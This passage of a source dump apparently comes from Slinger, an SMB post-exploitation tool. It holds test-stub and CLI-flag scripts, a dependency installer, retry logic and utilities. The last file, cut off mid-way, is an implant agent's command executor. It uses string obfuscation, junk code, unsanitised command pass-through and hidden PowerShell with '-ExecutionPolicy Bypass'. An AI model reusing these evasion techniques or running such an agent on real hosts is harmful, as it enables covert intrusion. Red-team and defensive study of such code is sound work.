| return server 83 | 84 | @pytest.fixture 85 | def runner(self, mock_server, monkeypatch): 86 | """Create test runner""" 87 | monkeypatch.setattr( 88 | "impacket.smbconnection.SMBConnection", 89 | lambda *args, **kwargs: mock_server.get_connection() 90 | ) 91 | 92 | runner = SlingerTestRunner(mock_server=mock_server) 93 | if not runner.start(host="192.168.1.100", username="testuser", password="testpass"): 94 | pytest.skip("Failed to start test runner") 95 | 96 | yield runner 97 | runner.stop() 98 | 99 | @pytest.mark.requires_mock_server 100 | def test_{command}_command_execution(self, runner): 101 | """Test {command} command execution""" 102 | # TODO: Implement integration test 103 | output = runner.send_command("{command}") 104 | assert "error" not in output.lower() 105 | 106 | @pytest.mark.requires_mock_server 107 | def test_{command}_with_mock_data(self, mock_server, runner): 108 | """Test {command} with mock data""" 109 | # TODO: Set up mock data and test 110 | assert False, "Test not implemented" 111 | ''' 112 | 113 | 114 | def generate_test_stub(command_name: str, force: bool = False): 115 | """Generate test stub files for a command""" 116 | # Ensure we're in project root 117 | project_root = Path(__file__).parent.parent 118 | os.chdir(project_root) 
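    # Paths below assume the standard layout (tests/unit, tests/integration); existing stubs are only overwritten when --force is passed.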
119 | 120 | # Create test directories if they don't exist 121 | unit_test_dir = project_root / "tests" / "unit" 122 | integration_test_dir = project_root / "tests" / "integration" 123 | 124 | unit_test_dir.mkdir(parents=True, exist_ok=True) 125 | integration_test_dir.mkdir(parents=True, exist_ok=True) 126 | 127 | # Generate class name 128 | command_class = "".join(word.capitalize() for word in command_name.split("_")) 129 | 130 | # Generate unit test 131 | unit_test_file = unit_test_dir / f"test_{command_name}.py" 132 | if not unit_test_file.exists() or force: 133 | unit_test_content = UNIT_TEST_TEMPLATE.format( 134 | command=command_name, 135 | command_class=command_class, 136 | date=datetime.now().strftime("%Y-%m-%d"), 137 | ) 138 | unit_test_file.write_text(unit_test_content) 139 | print(f"✓ Generated unit test: {unit_test_file}") 140 | else: 141 | print(f"⚠ Unit test already exists: {unit_test_file}") 142 | 143 | # Generate integration test 144 | integration_test_file = integration_test_dir / f"test_{command_name}.py" 145 | if not integration_test_file.exists() or force: 146 | integration_test_content = INTEGRATION_TEST_TEMPLATE.format( 147 | command=command_name, 148 | command_class=command_class, 149 | date=datetime.now().strftime("%Y-%m-%d"), 150 | ) 151 | integration_test_file.write_text(integration_test_content) 152 | print(f"✓ Generated integration test: {integration_test_file}") 153 | else: 154 | print(f"⚠ Integration test already exists: {integration_test_file}") 155 | 156 | # Create __init__.py files if needed 157 | (unit_test_dir / "__init__.py").touch(exist_ok=True) 158 | (integration_test_dir / "__init__.py").touch(exist_ok=True) 159 | 160 | print(f"\nTest stubs generated for '{command_name}' command.") 161 | print("Please implement the TODO sections in the generated tests.") 162 | 163 | 164 | def main(): 165 | """Main entry point""" 166 | if len(sys.argv) < 2: 167 | print("Usage: generate_test_stub.py [--force]") 168 | print("Example: generate_test_stub.py ls") 169 | sys.exit(1) 170 | 171 | command_name = sys.argv[1] 172 | force = "--force" in sys.argv 173 | 174 | generate_test_stub(command_name, force) 175 | 176 | 177 | if __name__ == "__main__": 178 | main() 179 | -------------------------------------------------------------------------------- /scripts/check_cli_flags.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | CLI Flag Naming Standards Checker 4 | 5 | Checks that all CLI flags in the project adhere to the naming standard: 6 | - Single letter flags: Use single hyphen (e.g., -l, -v, -h) 7 | - Multi-letter flags: Use double hyphen (e.g., --list, --verbose, --help) 8 | 9 | Usage: 10 | python scripts/check_cli_flags.py 11 | python scripts/check_cli_flags.py --fix-suggestions 12 | """ 13 | 14 | import re 15 | import sys 16 | import ast 17 | import argparse 18 | from pathlib import Path 19 | from typing import List, Tuple, Optional 20 | 21 | 22 | def extract_add_argument_calls(file_path: Path) -> List[Tuple[str, int, str]]: 23 | """Extract all add_argument calls from a Python file""" 24 | try: 25 | with open(file_path, "r", encoding="utf-8") as f: 26 | content = f.read() 27 | 28 | tree = ast.parse(content) 29 | violations = [] 30 | 31 | for node in ast.walk(tree): 32 | if ( 33 | isinstance(node, ast.Call) 34 | and isinstance(node.func, ast.Attribute) 35 | and node.func.attr == "add_argument" 36 | ): 37 | 38 | # Get the first argument (the flag name) 39 | if node.args: 40 | arg = node.args[0] 41 | 
if isinstance(arg, ast.Str): 42 | flag_name = arg.s 43 | elif isinstance(arg, ast.Constant) and isinstance(arg.value, str): 44 | flag_name = arg.value 45 | else: 46 | continue 47 | 48 | # Check for violations 49 | violation = check_flag_standards(flag_name, node.lineno) 50 | if violation: 51 | violations.append((str(file_path), node.lineno, violation)) 52 | 53 | return violations 54 | except Exception as e: 55 | print(f"Warning: Error parsing {file_path}: {e}") 56 | return [] 57 | 58 | 59 | def check_flag_standards(flag_name: str, line_no: int) -> Optional[str]: 60 | """Check if flag name adheres to standards""" 61 | # Skip positional arguments (no hyphens) 62 | if not flag_name.startswith("-"): 63 | return None 64 | 65 | # Single letter flags should use single hyphen 66 | if len(flag_name) == 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 67 | if flag_name[1].isalpha() or flag_name[1].isdigit(): 68 | return None # Correct: -l, -v, -1, etc. 69 | 70 | # Multi-letter flags should use double hyphen 71 | if len(flag_name) > 2 and flag_name.startswith("--"): 72 | return None # Correct: --list, --verbose, etc. 73 | 74 | # Check for violations 75 | 76 | # Single letter with double hyphen: --l 77 | if len(flag_name) == 3 and flag_name.startswith("--") and flag_name[2].isalnum(): 78 | return f'Single letter flag "{flag_name}" should use single hyphen: "-{flag_name[2]}"' 79 | 80 | # Multi-letter with single hyphen: -list 81 | elif len(flag_name) > 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 82 | return f'Multi-letter flag "{flag_name}" should use double hyphen: "-{flag_name}"' 83 | 84 | return None 85 | 86 | 87 | def suggest_fix(flag_name: str) -> str: 88 | """Suggest a fix for a non-standard flag name""" 89 | if len(flag_name) == 3 and flag_name.startswith("--"): 90 | return f"-{flag_name[2:]}" 91 | elif len(flag_name) > 2 and flag_name.startswith("-") and not flag_name.startswith("--"): 92 | return f"-{flag_name}" 93 | return flag_name 94 | 95 | 96 | def main(): 97 | parser = argparse.ArgumentParser(description="Check CLI flag naming standards") 98 | parser.add_argument( 99 | "--fix-suggestions", action="store_true", help="Show suggested fixes for violations" 100 | ) 101 | parser.add_argument("--src-dir", default="src", help="Source directory to check (default: src)") 102 | args = parser.parse_args() 103 | 104 | # Check all Python files in src directory 105 | src_dir = Path(args.src_dir) 106 | all_violations = [] 107 | 108 | if not src_dir.exists(): 109 | print(f"❌ Source directory '{src_dir}' does not exist") 110 | sys.exit(1) 111 | 112 | print(f"🔍 Checking CLI flag standards in {src_dir}/...") 113 | print("=" * 60) 114 | print("Standard: Single letter flags use single hyphen (-l)") 115 | print(" Multi-letter flags use double hyphen (--list)") 116 | print("=" * 60) 117 | 118 | # Only check CLI-related files, exclude internal tools like secretsdump 119 | cli_files = [src_dir / "slingerpkg" / "utils" / "cli.py", src_dir / "slingerpkg" / "slinger.py"] 120 | 121 | for py_file in cli_files: 122 | if py_file.exists(): 123 | violations = extract_add_argument_calls(py_file) 124 | all_violations.extend(violations) 125 | else: 126 | print(f"Warning: CLI file not found: {py_file}") 127 | 128 | # Report violations 129 | if all_violations: 130 | print(f"❌ Found {len(all_violations)} CLI flag standard violation(s):") 131 | print() 132 | 133 | current_file = None 134 | for file_path, line_no, violation in sorted(all_violations): 135 | if file_path != current_file: 
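                # Group the report by file: emit the 📁 header once per file, then each violation on its own line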
136 | print(f"📁 {file_path}") 137 | current_file = file_path 138 | 139 | print(f" Line {line_no}: {violation}") 140 | 141 | if args.fix_suggestions: 142 | # Extract the flag name from the violation message 143 | import re 144 | 145 | flag_match = re.search(r'"([^"]*)"', violation) 146 | if flag_match: 147 | flag_name = flag_match.group(1) 148 | suggested_fix = suggest_fix(flag_name) 149 | print(f" 💡 Suggested fix: {suggested_fix}") 150 | print() 151 | 152 | print("=" * 60) 153 | print(f"Total violations: {len(all_violations)}") 154 | print() 155 | print("Common patterns to fix:") 156 | print(" ❌ --l, --v, --h → ✅ -l, -v, -h") 157 | print(" ❌ -list, -verbose → ✅ --list, --verbose") 158 | print(" ❌ -output-file → ✅ --output-file") 159 | 160 | sys.exit(1) 161 | else: 162 | print("✅ All CLI flags adhere to naming standards!") 163 | print(f" Checked {len([f for f in cli_files if f.exists()])} CLI files") 164 | 165 | 166 | if __name__ == "__main__": 167 | main() 168 | -------------------------------------------------------------------------------- /scripts/install_agent_deps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Post-installation script for Slinger cooperative agent dependencies 4 | Run this after installing Slinger with pipx to set up agent build requirements 5 | """ 6 | 7 | import subprocess 8 | import sys 9 | import platform 10 | import shutil 11 | 12 | 13 | def run_command(cmd, shell=False): 14 | """Run a command and return success status""" 15 | try: 16 | result = subprocess.run(cmd, shell=shell, capture_output=True, text=True) 17 | return result.returncode == 0, result.stdout, result.stderr 18 | except Exception as e: 19 | return False, "", str(e) 20 | 21 | 22 | def check_dependency(command): 23 | """Check if a command exists""" 24 | return shutil.which(command) is not None 25 | 26 | 27 | def install_dependencies(): 28 | """Install system dependencies based on platform""" 29 | system = platform.system().lower() 30 | 31 | print("🔧 Slinger Cooperative Agent Dependencies Installer") 32 | print("=" * 50) 33 | 34 | # Check current status 35 | cmake_available = check_dependency("cmake") 36 | gcc_available = check_dependency("gcc") or check_dependency("g++") 37 | 38 | print(f"Current status:") 39 | print(f" CMake: {'✓ Available' if cmake_available else '✗ Not found'}") 40 | print(f" C++ Compiler: {'✓ Available' if gcc_available else '✗ Not found'}") 41 | print() 42 | 43 | if cmake_available and gcc_available: 44 | print("✅ All dependencies are already installed!") 45 | print("You can now use: slinger agent build") 46 | return True 47 | 48 | print("Installing missing dependencies...") 49 | print() 50 | 51 | if system == "linux": 52 | # Detect Linux distribution 53 | try: 54 | with open("/etc/os-release") as f: 55 | os_info = f.read().lower() 56 | except: 57 | os_info = "" 58 | 59 | if "ubuntu" in os_info or "debian" in os_info: 60 | print("📦 Detected Ubuntu/Debian - installing via apt...") 61 | print("Running: sudo apt update && sudo apt install -y cmake build-essential") 62 | 63 | # Update package list 64 | success, stdout, stderr = run_command(["sudo", "apt", "update"]) 65 | if not success: 66 | print(f"❌ Failed to update package list: {stderr}") 67 | return False 68 | 69 | # Install packages 70 | success, stdout, stderr = run_command( 71 | ["sudo", "apt", "install", "-y", "cmake", "build-essential"] 72 | ) 73 | if not success: 74 | print(f"❌ Failed to install packages: {stderr}") 75 | return False 76 | 77 | 
elif "centos" in os_info or "rhel" in os_info or "fedora" in os_info: 78 | print("📦 Detected CentOS/RHEL/Fedora - installing via yum/dnf...") 79 | 80 | # Try dnf first, fallback to yum 81 | pkg_manager = "dnf" if check_dependency("dnf") else "yum" 82 | 83 | print(f"Running: sudo {pkg_manager} groupinstall -y 'Development Tools'") 84 | success, stdout, stderr = run_command( 85 | ["sudo", pkg_manager, "groupinstall", "-y", "Development Tools"] 86 | ) 87 | if not success: 88 | print(f"❌ Failed to install Development Tools: {stderr}") 89 | return False 90 | 91 | print(f"Running: sudo {pkg_manager} install -y cmake") 92 | success, stdout, stderr = run_command(["sudo", pkg_manager, "install", "-y", "cmake"]) 93 | if not success: 94 | print(f"❌ Failed to install CMake: {stderr}") 95 | return False 96 | 97 | else: 98 | print("⚠️ Unknown Linux distribution. Please install manually:") 99 | print(" - CMake: https://cmake.org/download/") 100 | print(" - C++ compiler (gcc/g++)") 101 | return False 102 | 103 | elif system == "darwin": # macOS 104 | print("📦 Detected macOS - checking for Homebrew...") 105 | 106 | if not check_dependency("brew"): 107 | print("❌ Homebrew not found. Please install Homebrew first:") 108 | print( 109 | ' /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"' 110 | ) 111 | return False 112 | 113 | print("Running: brew install cmake") 114 | success, stdout, stderr = run_command(["brew", "install", "cmake"]) 115 | if not success: 116 | print(f"❌ Failed to install CMake via Homebrew: {stderr}") 117 | return False 118 | 119 | elif system == "windows": 120 | print("🪟 Detected Windows") 121 | print("Please install dependencies manually:") 122 | print(" 1. Download CMake from: https://cmake.org/download/") 123 | print(" 2. Install Visual Studio Build Tools or Visual Studio Community") 124 | print(" https://visualstudio.microsoft.com/downloads/") 125 | print() 126 | print("Alternative: Install via Chocolatey:") 127 | print(" choco install cmake visualstudio2022buildtools") 128 | return False 129 | 130 | else: 131 | print(f"⚠️ Unsupported platform: {system}") 132 | return False 133 | 134 | # Verify installation 135 | print("\n🔍 Verifying installation...") 136 | cmake_available = check_dependency("cmake") 137 | gcc_available = check_dependency("gcc") or check_dependency("g++") 138 | 139 | print(f" CMake: {'✓ Available' if cmake_available else '✗ Still not found'}") 140 | print(f" C++ Compiler: {'✓ Available' if gcc_available else '✗ Still not found'}") 141 | 142 | if cmake_available and gcc_available: 143 | print("\n✅ All dependencies installed successfully!") 144 | print("You can now use: slinger agent build") 145 | return True 146 | else: 147 | print("\n❌ Some dependencies are still missing. 
Please install manually.") 148 | return False 149 | 150 | 151 | def main(): 152 | """Main installation function""" 153 | try: 154 | success = install_dependencies() 155 | 156 | if success: 157 | print("\n🚀 Test your installation:") 158 | print(" slinger agent info") 159 | print(" slinger agent build --dry-run") 160 | sys.exit(0) 161 | else: 162 | print("\n📖 For manual installation instructions, see:") 163 | print(" https://github.com/ghost-ng/slinger#agent-dependencies") 164 | sys.exit(1) 165 | 166 | except KeyboardInterrupt: 167 | print("\n\n⚠️ Installation cancelled by user.") 168 | sys.exit(1) 169 | except Exception as e: 170 | print(f"\n❌ Unexpected error: {e}") 171 | sys.exit(1) 172 | 173 | 174 | if __name__ == "__main__": 175 | main() 176 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/error_recovery.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Basic Error Recovery for Resume Downloads 4 | 5 | This module provides basic error recovery and retry logic for download operations. 6 | """ 7 | 8 | import time 9 | import random 10 | from enum import Enum 11 | from typing import Optional 12 | 13 | from slingerpkg.utils.printlib import print_debug, print_warning, print_info 14 | 15 | 16 | class RetryableError(Exception): 17 | """Exception for errors that can be retried""" 18 | 19 | def __init__(self, message, retry_delay=1.0): 20 | super().__init__(message) 21 | self.retry_delay = retry_delay 22 | 23 | 24 | class FatalError(Exception): 25 | """Exception for errors that cannot be retried""" 26 | 27 | pass 28 | 29 | 30 | def classify_smb_error(error_message: str) -> bool: 31 | """ 32 | Classify SMB error to determine if it's retryable. 33 | 34 | Args: 35 | error_message: The error message to classify 36 | 37 | Returns: 38 | True if retryable, False if fatal 39 | """ 40 | error_msg_lower = error_message.lower() 41 | 42 | # Retryable errors 43 | retryable_patterns = [ 44 | "timeout", 45 | "timed out", 46 | "connection timeout", 47 | "connection reset", 48 | "connection lost", 49 | "broken pipe", 50 | "network is unreachable", 51 | "no route to host", 52 | "status_invalid_smb", 53 | "status_smb_bad_tid", 54 | "status_invalid_handle", 55 | "status_network_name_deleted", 56 | "too busy", 57 | "server busy", 58 | "status_too_many_connections", 59 | ] 60 | 61 | # Fatal errors 62 | fatal_patterns = [ 63 | "status_object_name_not_found", 64 | "file not found", 65 | "status_access_denied", 66 | "access denied", 67 | "permission denied", 68 | "no space left", 69 | "disk full", 70 | "status_disk_full", 71 | "file size changed", 72 | "file modified", 73 | "checksum mismatch", 74 | ] 75 | 76 | # Check for fatal errors first 77 | for pattern in fatal_patterns: 78 | if pattern in error_msg_lower: 79 | return False 80 | 81 | # Check for retryable errors 82 | for pattern in retryable_patterns: 83 | if pattern in error_msg_lower: 84 | return True 85 | 86 | # Unknown errors are treated as retryable (optimistic approach) 87 | return True 88 | 89 | 90 | class SimpleRetryManager: 91 | """ 92 | Simple retry manager with exponential backoff for download operations. 
93 | """ 94 | 95 | def __init__(self, max_retries: int = 3, base_delay: float = 1.0, max_delay: float = 30.0): 96 | self.max_retries = max_retries 97 | self.base_delay = base_delay 98 | self.max_delay = max_delay 99 | 100 | def get_retry_delay(self, attempt: int) -> float: 101 | """Calculate retry delay with exponential backoff and jitter""" 102 | if attempt <= 0: 103 | return 0 104 | 105 | # Exponential backoff: 1s, 2s, 4s, 8s, etc. 106 | delay = self.base_delay * (2 ** (attempt - 1)) 107 | delay = min(delay, self.max_delay) 108 | 109 | # Add 10% jitter to prevent thundering herd 110 | jitter = delay * 0.1 * random.uniform(-1, 1) 111 | return max(0, delay + jitter) 112 | 113 | def should_retry(self, error_message: str, attempt: int) -> bool: 114 | """Determine if operation should be retried""" 115 | if attempt >= self.max_retries: 116 | return False 117 | 118 | return classify_smb_error(error_message) 119 | 120 | def execute_with_retry(self, operation, *args, **kwargs): 121 | """ 122 | Execute operation with retry logic. 123 | 124 | Args: 125 | operation: Function to execute 126 | *args, **kwargs: Arguments for the operation 127 | 128 | Returns: 129 | Operation result or raises final exception 130 | """ 131 | last_error = None 132 | 133 | for attempt in range(self.max_retries + 1): 134 | try: 135 | return operation(*args, **kwargs) 136 | 137 | except Exception as e: 138 | last_error = e 139 | error_msg = str(e) 140 | 141 | if not self.should_retry(error_msg, attempt): 142 | print_debug(f"Error not retryable: {error_msg}") 143 | break 144 | 145 | if attempt < self.max_retries: 146 | delay = self.get_retry_delay(attempt + 1) 147 | print_warning( 148 | f"Operation failed (attempt {attempt + 1}/{self.max_retries + 1}): {error_msg}" 149 | ) 150 | print_info(f"Retrying in {delay:.1f} seconds...") 151 | time.sleep(delay) 152 | else: 153 | print_warning(f"Final attempt failed: {error_msg}") 154 | 155 | # All retries exhausted 156 | raise last_error 157 | 158 | 159 | def with_basic_retry(max_retries: int = 3): 160 | """ 161 | Decorator for adding basic retry logic to methods. 162 | 163 | Usage: 164 | @with_basic_retry(max_retries=3) 165 | def download_chunk(self, remote_path, offset, chunk_size): 166 | # Method implementation 167 | """ 168 | 169 | def decorator(func): 170 | def wrapper(*args, **kwargs): 171 | retry_manager = SimpleRetryManager(max_retries=max_retries) 172 | return retry_manager.execute_with_retry(func, *args, **kwargs) 173 | 174 | return wrapper 175 | 176 | return decorator 177 | 178 | 179 | # Utility functions for connection recovery 180 | def reconnect_smb_with_retry(connection_factory, max_attempts: int = 3): 181 | """ 182 | Attempt to reconnect SMB connection with retry logic. 
183 | 184 | Args: 185 | connection_factory: Function that creates a new SMB connection 186 | max_attempts: Maximum reconnection attempts 187 | 188 | Returns: 189 | New connection or None if failed 190 | """ 191 | for attempt in range(max_attempts): 192 | try: 193 | print_info(f"Attempting SMB reconnection (attempt {attempt + 1}/{max_attempts})...") 194 | connection = connection_factory() 195 | if connection: 196 | print_info("SMB connection re-established successfully") 197 | return connection 198 | except Exception as e: 199 | error_msg = str(e) 200 | print_warning(f"Reconnection attempt {attempt + 1} failed: {error_msg}") 201 | 202 | if attempt < max_attempts - 1: 203 | delay = 2**attempt # 1s, 2s, 4s 204 | print_info(f"Waiting {delay}s before next attempt...") 205 | time.sleep(delay) 206 | 207 | print_warning("Failed to re-establish SMB connection after all attempts") 208 | return None 209 | 210 | 211 | def validate_chunk_integrity(chunk_data: bytes, expected_size: int) -> bool: 212 | """ 213 | Basic validation of downloaded chunk data. 214 | 215 | Args: 216 | chunk_data: Downloaded chunk bytes 217 | expected_size: Expected chunk size 218 | 219 | Returns: 220 | True if chunk appears valid 221 | """ 222 | if chunk_data is None: 223 | return False 224 | 225 | if len(chunk_data) > expected_size: 226 | print_warning(f"Chunk size larger than expected: {len(chunk_data)} > {expected_size}") 227 | return False 228 | 229 | # Basic validation passed 230 | return True 231 | -------------------------------------------------------------------------------- /src/slingerpkg/utils/common.py: -------------------------------------------------------------------------------- 1 | import string 2 | import subprocess 3 | import random 4 | import datetime 5 | import xml.etree.ElementTree as ET 6 | import re 7 | from impacket.dcerpc.v5 import rrp, srvs, wkst, tsch, scmr, even, even6 8 | from impacket.dcerpc.v5.dcom import wmi 9 | from slingerpkg.utils.printlib import * 10 | from slingerpkg.var.config import config_vars 11 | from tabulate import tabulate 12 | import sys 13 | from contextlib import contextmanager 14 | 15 | # dictionarty of UUID endpoints to plaintext names 16 | uuid_endpoints = { 17 | srvs.MSRPC_UUID_SRVS: "srvs", 18 | wkst.MSRPC_UUID_WKST: "wkst", 19 | tsch.MSRPC_UUID_TSCHS: "tsch", 20 | scmr.MSRPC_UUID_SCMR: "scmr", 21 | rrp.MSRPC_UUID_RRP: "rrp", 22 | even.MSRPC_UUID_EVEN: "even", 23 | even6.MSRPC_UUID_EVEN6: "even6", 24 | # WMI named pipe endpoints 25 | "8BC3F05E-D86B-11D0-A075-00C04FB68820": "wmi_level1", 26 | "44ACA674-E8FC-11D0-A07C-00C04FB68820": "wmi_level2", 27 | "027947E1-D731-11CE-A357-000000000001": "wmi_enumwbem", 28 | "423EC01E-2E35-11D2-B604-00104B703EFD": "wmi_services", 29 | } 30 | 31 | 32 | def convert_to_bool(value): 33 | # Define strings that should be interpreted as True 34 | true_values = {"t", "tr", "true", "yes", "y", "1"} 35 | 36 | # Check if the value is a string and convert it to lowercase for comparison 37 | if isinstance(value, str): 38 | value = value.lower() 39 | return value in true_values 40 | 41 | # For non-string values, use the standard bool conversion 42 | return bool(value) 43 | 44 | 45 | def reduce_slashes(paths): 46 | """ 47 | Reduces all consecutive backslashes in each string of the list to a single backslash. 
48 | 49 | :param paths: List of strings with paths 50 | :return: List of strings with reduced backslashes 51 | """ 52 | if type(paths) is not list: 53 | return re.sub(r"\\+", r"\\", paths) 54 | if type(paths) is list: 55 | return [re.sub(r"\\+", r"\\", path) for path in paths] 56 | 57 | 58 | def sizeof_fmt(num, suffix="B"): 59 | for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]: 60 | if abs(num) < 1024.0: 61 | return "%3.1f%s%s" % (num, unit, suffix) 62 | num /= 1024.0 63 | return "%.1f%s%s" % (num, "Yi", suffix) 64 | 65 | 66 | def run_local_command(command): 67 | process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 68 | stdout, stderr = process.communicate() 69 | if stdout: 70 | print_log(stdout.decode()) 71 | if stderr: 72 | print_log(stderr.decode()) 73 | 74 | 75 | def remove_null_terminator(s): 76 | # Remove common null terminator patterns from the end of the string 77 | return re.sub(r"(\x00|\\0)$", "", s) 78 | 79 | 80 | def escape_single_backslashes(path): 81 | # Replace single backslashes with double backslashes, but not already doubled ones 82 | return re.sub(r"(?": ">", 141 | "<": "<", 142 | } 143 | return "".join(replace_table.get(c, c) for c in data) 144 | 145 | 146 | def generate_random_string(length=6, end=6): 147 | random.seed() 148 | # return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) 149 | return "".join( 150 | random.choices(string.ascii_letters + string.digits, k=random.randint(length, end)) 151 | ) 152 | 153 | 154 | def validate_xml(xml_string): 155 | try: 156 | ET.fromstring(xml_string) 157 | print_log("XML is valid") 158 | except ET.ParseError as e: 159 | print_log(e) 160 | return False 161 | 162 | 163 | def enter_interactive_debug_mode(local=None): 164 | import code 165 | import sys 166 | 167 | if local is None: 168 | local = {} 169 | 170 | # Combine globals and locals into one dictionary 171 | combined_scope = globals().copy() 172 | combined_scope.update(local) 173 | 174 | print_info("Entering interactive mode") 175 | 176 | # Save the original `sys.ps1` and `sys.stdout` 177 | original_ps1 = sys.ps1 if hasattr(sys, "ps1") else ">>> " 178 | original_stdout = sys.stdout 179 | 180 | class CustomStdout: 181 | def __init__(self, original_stdout): 182 | self.original_stdout = original_stdout 183 | 184 | def write(self, message): 185 | # Always write to stdout 186 | self.original_stdout.write(message) 187 | 188 | def flush(self): 189 | self.original_stdout.flush() 190 | 191 | def custom_exit(): 192 | print_warning("Invalid Exit Caught") 193 | 194 | # Add custom exit handlers to the local scope 195 | combined_scope["exit"] = custom_exit 196 | combined_scope["quit"] = custom_exit 197 | 198 | try: 199 | # Override `sys.ps1` to include the warning message 200 | sys.ps1 = f"\n{colors.WARNING}[!] 
Reminder: Use Ctrl-D to exit interactive mode.{colors.ENDC}\n{original_ps1}" 201 | 202 | # Replace stdout to ensure clean output 203 | sys.stdout = CustomStdout(original_stdout) 204 | 205 | # Start the interactive session 206 | code.interact( 207 | banner=f"\n{colors.HEADER}[*] Interactive Debug Mode Activated{colors.ENDC}", 208 | local=combined_scope, 209 | ) 210 | 211 | finally: 212 | # Restore the original settings 213 | sys.ps1 = original_ps1 214 | sys.stdout = original_stdout 215 | print_info("Exited interactive mode") 216 | 217 | 218 | def get_config_value(key): 219 | try: 220 | for c in config_vars: 221 | if c["Name"].lower() == key.lower(): 222 | return c["Value"] 223 | print_warning(f"Config variable '{key}' does not exist") 224 | except KeyError: 225 | print_warning(f"Config variable '{key}' does not exist") 226 | return 227 | 228 | 229 | # function to set a value in the config dictionary 230 | def set_config_value(key, value): 231 | try: 232 | for c in config_vars: 233 | if c["Name"].lower() == key.lower(): 234 | if c["Type"] == "bool": 235 | c["Value"] = convert_to_bool(value) 236 | elif c["Type"] == "int": 237 | try: 238 | c["Value"] = int(value) 239 | except ValueError: 240 | print_warning(f"Invalid value for '{key}', needs to be an integer") 241 | else: 242 | c["Value"] = value 243 | 244 | print_log(f"{key} --> {str(c['Value'])}") 245 | 246 | return 247 | print_warning(f"Config variable '{key}' does not exist") 248 | except KeyError: 249 | print_warning(f"Config variable '{key}' does not exist") 250 | return 251 | 252 | 253 | # function to display the current config 254 | def show_config(): 255 | # print the config in a tabulate table 256 | print_log( 257 | tabulate( 258 | [[c["Name"], c["Value"], c["Description"]] for c in config_vars], 259 | headers=["Name", "Value", "Description"], 260 | ) 261 | ) 262 | 263 | 264 | class TeeOutput: 265 | def __init__(self, filename): 266 | self.file = open(filename, "a") # Open file in append mode 267 | self.stdout = sys.stdout 268 | self.stderr = sys.stderr 269 | 270 | def write(self, data): 271 | self.stdout.write(data) # Write to the console 272 | self.file.write(data) # Write to the file 273 | 274 | def flush(self): 275 | self.stdout.flush() 276 | self.file.flush() 277 | 278 | def close(self): 279 | self.file.close() 280 | 281 | 282 | @contextmanager 283 | def tee_output(filename): 284 | if filename is None: 285 | yield 286 | return 287 | tee = TeeOutput(filename) 288 | sys.stdout = tee 289 | sys.stderr = tee 290 | try: 291 | yield 292 | finally: 293 | sys.stdout = tee.stdout 294 | sys.stderr = tee.stderr 295 | tee.close() 296 | -------------------------------------------------------------------------------- /lib/agent_templates/command_executor.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "obfuscation.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | // Cross-platform compatibility layer 10 | #ifdef _WIN32 11 | #include 12 | #else 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #ifndef PATH_MAX 20 | #define PATH_MAX 4096 21 | #endif 22 | #ifndef MAX_PATH 23 | #define MAX_PATH PATH_MAX 24 | #endif 25 | #endif 26 | 27 | namespace obf = obfuscated; 28 | 29 | // Obfuscated command strings (cross-platform) 30 | #ifdef _WIN32 31 | constexpr auto CMD_EXE = OBF_STRING("cmd.exe"); 32 | constexpr auto POWERSHELL_EXE = OBF_STRING("powershell.exe"); 33 | constexpr auto CMD_FLAG = OBF_STRING("/c"); 34 | constexpr 
auto PS_FLAGS = OBF_STRING("-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command"); 35 | #else 36 | constexpr auto CMD_EXE = OBF_STRING("/bin/sh"); 37 | constexpr auto POWERSHELL_EXE = OBF_STRING("/bin/bash"); 38 | constexpr auto CMD_FLAG = OBF_STRING("-c"); 39 | constexpr auto PS_FLAGS = OBF_STRING("-c"); 40 | #endif 41 | constexpr auto SUCCESS_PREFIX = OBF_STRING("[+] "); 42 | constexpr auto ERROR_PREFIX = OBF_STRING("[-] "); 43 | constexpr auto INFO_PREFIX = OBF_STRING("[*] "); 44 | 45 | class CommandExecutor { 46 | private: 47 | obf::XOREncoder encoder; 48 | 49 | // Obfuscated method names 50 | std::string OBF_FUNC_NAME(execute_cmd)(const std::string& command); 51 | std::string OBF_FUNC_NAME(execute_powershell)(const std::string& command); 52 | std::string OBF_FUNC_NAME(execute_with_createprocess)(const std::string& cmd_line); 53 | bool OBF_FUNC_NAME(is_powershell_command)(const std::string& command); 54 | std::string OBF_FUNC_NAME(sanitize_command)(const std::string& command); 55 | 56 | public: 57 | CommandExecutor(); 58 | ~CommandExecutor(); 59 | 60 | std::string execute(const std::string& command); 61 | std::string get_system_info(); 62 | std::string list_processes(); 63 | std::string get_current_directory(); 64 | bool change_directory(const std::string& path); 65 | }; 66 | 67 | // Implementation 68 | CommandExecutor::CommandExecutor() { 69 | obf::insert_junk_code(); 70 | } 71 | 72 | CommandExecutor::~CommandExecutor() { 73 | obf::insert_junk_code(); 74 | } 75 | 76 | bool CommandExecutor::OBF_FUNC_NAME(is_powershell_command)(const std::string& command) { 77 | std::string lower_cmd = command; 78 | std::transform(lower_cmd.begin(), lower_cmd.end(), lower_cmd.begin(), ::tolower); 79 | 80 | return lower_cmd.find("get-") == 0 || 81 | lower_cmd.find("set-") == 0 || 82 | lower_cmd.find("invoke-") == 0 || 83 | lower_cmd.find("new-") == 0 || 84 | lower_cmd.find("$") != std::string::npos; 85 | } 86 | 87 | std::string CommandExecutor::OBF_FUNC_NAME(sanitize_command)(const std::string& command) { 88 | // No sanitization - let cmd.exe handle command parsing 89 | // This allows legitimate redirection (>, <, |, &) and other shell features 90 | return command; 91 | } 92 | 93 | std::string CommandExecutor::OBF_FUNC_NAME(execute_with_createprocess)(const std::string& cmd_line) { 94 | obf::insert_junk_code(); 95 | 96 | #ifdef _WIN32 97 | SECURITY_ATTRIBUTES sa; 98 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 99 | sa.lpSecurityDescriptor = NULL; 100 | 